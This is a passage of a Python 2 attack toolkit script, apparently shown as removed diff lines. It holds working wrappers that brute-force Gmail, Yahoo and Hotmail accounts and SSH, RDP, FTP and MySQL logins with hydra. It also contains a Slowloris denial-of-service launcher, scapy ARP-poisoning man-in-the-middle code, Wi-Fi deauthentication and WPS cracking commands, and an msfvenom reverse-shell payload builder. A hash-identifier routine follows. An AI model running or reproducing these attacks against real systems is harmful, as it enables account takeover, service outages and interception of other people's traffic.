Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" - -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') - -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def arppois(): - - try: - os.system("iwconfig") - interface = raw_input("[*] Enter Interface: ") - victimIP = raw_input("[*] Enter Victim IP: ") - gateIP = raw_input("[*] Enter Router IP: ") - except KeyboardInterrupt: - print "\n[*] User Requested Shutdown" - print "[*] Exiting..." - os.system("clear") - mainbanner() - - print "\n[*] Enabling IP Forwarding...\n" - os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") - - def get_mac(IP): - conf.verb = 0 - ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1) - for snd,rcv in ans: - return rcv.sprintf(r"%Ether.src%") - - def reARP(): - - print "\n[*] Restoring Targets..." - victimMAC = get_mac(victimIP) - gateMAC = get_mac(gateIP) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7) - send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7) - print "[*] Disabling IP Forwarding..." - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[*] Shutting Down..." - os.system("clear") - mainbanner() - - def trick(gm, vm): - send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm)) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm)) - - def mitm(): - try: - victimMAC = get_mac(victimIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Victim MAC Address" - print "[!] Exiting..." - os.system("clear") - mainbanner() - try: - gateMAC = get_mac(gateIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Gateway MAC Address" - print "[!] Exiting..." - os.system("clear") - mainbanner() - print "[*] Poisoning Targets..." - while 1: - try: - trick(gateMAC, victimMAC) - time.sleep(1.5) - except KeyboardInterrupt: - reARP() - break - mitm() -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - os.system("cat /root/hackers-tool-kit/tools/formats.txt") - s = raw_input("Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) - os.system(a) -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - 